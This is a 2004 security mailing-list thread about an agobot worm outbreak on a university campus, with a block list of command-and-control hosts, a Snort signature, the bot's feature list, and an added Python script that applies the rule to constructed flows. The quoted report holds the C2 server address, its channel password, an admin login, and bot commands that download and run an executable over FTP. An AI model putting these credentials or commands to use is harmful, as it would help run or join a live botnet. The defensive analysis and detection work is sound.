We have currently blocked connections to/from port 7000 on the following hosts:

130.74.82.206
131.234.100.43
193.87.20.31

This seems to have contained the spread of the worm within our campus.

The list of hosts was gathered with a snort signature of:

alert tcp $HOME_NET any -> any 7000 (msg:"agobot IRC traffic"; content:"weednet"; classtype:bad-unknown; sid:71727; rev:1;)

Until the block was in place we had shut down around 50 hosts (mainly on our dorm network) that had been infected with the worm.

-Dave Hale
Sr. Security Specialist
Michigan Technological University

> ----- Original Message -----
> From: "Morning Wood"
> Date: Sat, 24 Apr 2004 18:37:31 +0000
> To: [EMAIL PROTECTED], [EMAIL PROTECTED]
> Subject: RE: [Full-Disclosure] Re: Outbreak of a virus on campus
>
>> phatbot?
>
> This one is yet another agobot. It has a long list of useful commands
> (included at the end of the posting, if someone is interested...),
> polymorph capability, stealth capability (hides its own process
> in memory and its binary from listing), is capable of updating itself
> via ftp/http, has a list of servers for evaluating connection speed,
> steals cdkeys, sniffs the wire, performs ddos, is capable of installing
> a proxy, sends spam via aol, can install identd, has a LONG list of
> various processes to kill (mostly AV, but also regedit and tcpview
> among others), retrieves sysinfo, makes screenshots etc etc etc -
> looks similar to other good household bots :)
>
> What makes it interesting is its stealth capability and propagation.
> It has the following scanning/propagation subroutines:
>
> CScannerBagle
> CScannerBase
> CScannerDCOM
> CScannerDoom
> CScannerDW
> CScannerHTTP
> CScannerNetBios
> CScannerOptix
> CScannerSQL
> CScannerUPNP
> CScannerWKS
>
> When the worm is started, it connects to irc server
> 193.87.20.31 (irc.weednet.net) port 7000.
> Then it joins the password-protected channel
> #1337; the password is heyho. As the channel topic is
> .scan.startall, it accepts the command and starts
> scanning right away.
>
> I took my trusty irc client and joined that
> channel myself. Right away admin gave me these
> commands:
>
> <admin> .login stebo jamesbond007 -s
> <admin> .ftp.update ftp://ftp:[EMAIL PROTECTED]/incoming/dt.exe %TEMP%\xgf.exe BLAOR12
> <admin> .scan.stop
> <admin> .ftp.update ftp://ftp:[EMAIL PROTECTED]/incoming/dt.exe c:\xgf.exe BLAOR12
>
> seems like my 'bot' version was too old :)
>
> have fun :)
>
> W.
>
> -----------------------
> commands and parameters
> all commands start with . (dot)
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
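The Snort rule Dave posted encodes a simple three-part match (source inside $HOME_NET, destination port 7000, payload containing "weednet"), and W.'s walkthrough shows what the bot does once connected (joins #1337, takes dot-prefixed commands from the channel topic and from the admin). The Python script below is an added example, not code from either message: it applies the same match to constructed IRC flows to list the hosts the rule would have flagged, and pulls the dot-commands out of the server side of the matched sessions. The $HOME_NET ranges, the flow records, the payloads and the idea that the bot's PONG to the server name is where "weednet" appears in client-to-server data are all constructed assumptions; the IRC framing used (RPL_TOPIC 332 on join, PRIVMSG from the admin) is standard IRC, assumed to be how the bot received the quoted commands. One caveat on the rule itself: Snort reserves sid values below 1000000 for distributed rule sets, so a locally written rule like this one would normally carry a sid of 1000000 or higher to avoid collisions.

```python
"""Offline re-implementation of the match logic in the Snort rule

    alert tcp $HOME_NET any -> any 7000 (content:"weednet"; ...)

applied to constructed IRC flows, plus extraction of the dot-prefixed
agobot commands from the server side of the matched sessions.
Added example; not code from either message on the list."""
import ipaddress
import re
from dataclasses import dataclass

# Assumption: $HOME_NET covers the campus ranges the blocked hosts sit in.
HOME_NET = [ipaddress.ip_network("130.74.0.0/16"),
            ipaddress.ip_network("131.234.0.0/16")]
C2_PORT = 7000                 # "-> any 7000" in the rule
CONTENT = b"weednet"           # content:"weednet" in the rule


@dataclass
class Flow:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes             # reassembled TCP payload, one direction only


def in_home_net(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in HOME_NET)


def rule_matches(flow: Flow) -> bool:
    """True when the Snort rule would fire on this flow direction."""
    return (flow.dport == C2_PORT
            and in_home_net(flow.src)
            and CONTENT in flow.payload)


def infected_hosts(flows) -> list:
    """Sorted unique sources the rule flags: how the host list was gathered."""
    return sorted({f.src for f in flows if rule_matches(f)})


# Standard IRC framing: RPL_TOPIC (332) on join, TOPIC, or PRIVMSG/NOTICE from
# the admin; the bot command is the trailing parameter after ':'.
BOT_CMD = re.compile(
    rb"^(?::\S+ )?(?:332|TOPIC|PRIVMSG|NOTICE) [^:]*:(\.[\w.]+)(?: (.*))?$")


def bot_commands(flows, c2_port: int = C2_PORT) -> list:
    """(victim, command, args) for every dot-command sent from the C2 port."""
    found = []
    for f in flows:
        if f.sport != c2_port:
            continue
        for line in f.payload.split(b"\r\n"):
            m = BOT_CMD.match(line)
            if m:
                found.append((f.dst, m.group(1).decode(),
                              (m.group(2) or b"").decode()))
    return found


# Constructed sample flows (not captured traffic).
SAMPLE_FLOWS = [
    # infected dorm host: joins #1337 with the password, answers the server PING
    Flow("130.74.82.206", "193.87.20.31", 1234, 7000,
         b"NICK xgf-1234\r\nJOIN #1337 heyho\r\nPONG :irc.weednet.net\r\n"),
    # C2 side of the same session: topic carries the scan order, admin follows up
    Flow("193.87.20.31", "130.74.82.206", 7000, 1234,
         b":irc.weednet.net 332 xgf-1234 #1337 :.scan.startall\r\n"
         b":admin!a@b PRIVMSG #1337 :.login stebo jamesbond007 -s\r\n"
         b":admin!a@b PRIVMSG #1337 :.scan.stop\r\n"),
    # second infected host
    Flow("131.234.100.43", "193.87.20.31", 4321, 7000,
         b"JOIN #1337 heyho\r\nPONG :irc.weednet.net\r\n"),
    # benign IRC to port 7000: no "weednet" in payload
    Flow("130.74.1.1", "192.0.2.10", 5555, 7000,
         b"JOIN #linux\r\nPONG :irc.example.net\r\n"),
    # right string, wrong port: rule stays silent
    Flow("130.74.1.2", "193.87.20.31", 5556, 6667, b"PONG :irc.weednet.net\r\n"),
    # off-campus source: outside $HOME_NET, so not this sensor's problem
    Flow("198.51.100.7", "193.87.20.31", 5557, 7000, b"PONG :irc.weednet.net\r\n"),
]

if __name__ == "__main__":
    for host in infected_hosts(SAMPLE_FLOWS):
        print("infected:", host)
    for victim, cmd, args in bot_commands(SAMPLE_FLOWS):
        print(f"{victim} <- {cmd} {args}".rstrip())
```

The two negative cases in the sample data are the ones to keep in mind when tuning a content rule like this: the same string on another port is invisible to a port-bound rule, and a benign IRC session on port 7000 is silent only because the server name differs, so a bot pointed at a new IRC server name would slip past until the content string is updated.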
